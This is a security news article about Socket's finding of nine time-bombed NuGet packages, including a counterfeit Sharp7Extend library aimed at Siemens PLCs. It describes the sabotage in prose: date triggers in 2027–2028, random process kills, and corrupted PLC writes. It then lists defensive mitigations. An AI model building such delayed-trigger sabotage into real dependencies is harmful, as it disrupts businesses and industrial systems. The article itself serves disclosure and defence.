Researchers at Socket report the discovery of nine malicious NuGet packages engineered with delayed activation designed to evade detection for years. The payloads are tailored to .NET data access (SQL Server, PostgreSQL, SQLite) and to industrial communication with Siemens PLCs via the Sharp7 stack, with sabotage logic set to trigger between August 2027 and November 2028.
What Socket Found: Time‑Bombed NuGet Packages in the .NET Ecosystem
All flagged packages were published in 2023–2024 by a user named shanhai666. In total, 12 packages were released; nine contained malicious functionality while three appeared benign. Cumulative downloads approached 9,500 prior to removal from NuGet, and the number of projects that pulled these packages as transitive dependencies remains unknown.
The attackers invested heavily in camouflage: ~99% of code delivered legitimate functionality, with the destructive logic hidden in roughly 20 lines. This tactic reduces the odds of detection during static analysis and quick code reviews, especially when libraries appear useful and well‑structured.
How the Sabotage Works: C# Extension Methods and Date‑Based Triggers
The payloads piggyback on C# extension methods commonly used for database operations or industrial communications. On invocation, the code compares the system date against hard‑coded trigger dates spanning 08.08.2027–29.11.2028. When a trigger date matches, a random value between 1 and 100 is generated; if the value is above 80, the library force‑kills the current process via Process.GetCurrentProcess().Kill(), yielding a 20% chance of abrupt termination that mimics sporadic software or infrastructure instability.
Industrial Control Risk: Counterfeit Sharp7Extend Targets Siemens PLCs
One package, Sharp7Extend, impersonates an “extension” to the widely used Sharp7 library for Ethernet communications with Siemens PLCs. The naming likely aimed to entice engineers searching for enhanced Sharp7 capabilities, increasing adoption in ICS/OT environments.
Observed Sabotage Behaviors Against PLC Workloads
For PLC clients, Sharp7Extend can immediately drop connections with a 20% probability (until 06.06.2028). It also attempts to read a non‑existent configuration key to break initialization. In addition, the package sets an internal delay of 30–90 minutes, after which 80% of write operations to PLCs are corrupted—combining instant disruption with delayed data integrity attacks.
Why Detection and Forensics Are Difficult
Delayed activation years in the future and probabilistic execution complicate triage. By 2027–2028, development teams integrating these packages in 2024 may be disbanded or reassigned, and production incidents may be misattributed to hardware fluctuations or rare software defects. Similar long‑game tactics have surfaced in other ecosystems—examples include the event-stream npm compromise and the xz backdoor (2024)—highlighting the maturity and patience of modern software supply chain adversaries. Independent research from firms such as Sonatype and ReversingLabs has repeatedly documented the rise of malicious packages across npm, PyPI, and NuGet, underscoring that this is an ecosystem‑wide problem, not a one‑off anomaly.
Recommended Mitigations for Software Supply Chain Security
Socket advises auditing codebases and build artifacts for the identified packages and treating any affected systems as compromised. Organizations should also:
- Perform a full dependency inventory and generate an SBOM (CycloneDX or SPDX) with precise version pinning.
- Lock versions, use private feeds/mirrors, and verify artifact integrity (checksums/signatures) in CI/CD.
- Harden code reviews around extension methods that intercept database/PLC calls and other hooks in critical paths.
- Enable behavioral monitoring and logging for unexpected process exits, database anomalies, and PLC write errors.
- Continuously scan source and binaries for time‑based triggers, suspicious process‑kill calls, and obfuscated date logic.
- Adopt supply‑chain baselines and frameworks (e.g., SLSA, NIST SSDF) to strengthen trust in third‑party components.
This campaign illustrates the growing sophistication of software supply chain attacks against both enterprise and ICS/OT workloads. Teams should act now: remove suspect packages, refresh dependency trust policies, automate scanning and forensics, and capture “known‑good” baselines. Early, disciplined controls substantially increase the odds of containing and neutralizing these time‑bombed dependencies before they impact operations.
